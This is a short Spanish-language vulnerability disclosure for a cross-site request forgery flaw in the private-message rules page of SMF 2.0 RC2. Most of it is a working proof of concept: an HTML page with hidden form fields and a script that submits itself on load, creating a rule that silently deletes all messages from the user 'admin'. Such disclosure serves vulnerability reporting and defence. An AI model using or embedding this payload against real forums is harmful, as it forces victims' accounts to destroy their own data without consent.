Descripción: | CSRF en las reglas de mensajes |
Descubierto por: | brlvldvlsmrtnz@gmail.com |
Código vulnerable: | N/A |
URL Vulnerable: | http://localhost/SMF/index.php?action=pm;sa=manrules |
PoC: | N/A |
Afecta a: | SMF 2.0 RC2 |
Descripción
Este CSRF permitiría hacer cosas como que el usuario afectado borrara
automáticamente los MPs de otro usuario determinado.
La vulnerabilidad está en la url :
http://localhost/SMF/index.php?action=pm;sa=manrules
este POC que crea una regla que borra todos los mensajes que provengan
del user admin:
Código
<html> <head> </head> <body> <form name=POC method=POST action=http://localhost/SMF/index.php?action=pm;sa=manrules;save;rid=0> <input type=hidden value="Regla creada por CSRF" name=rule_name> <input type=hidden name=ruletype[0] value=mid> <input type=hidden name=ruledef[0] value=admin> <input type=hidden name=acttype[0] value=del> <input type=hidden name=save > </form> <script> document.POC.submit(); </script> </body> </html>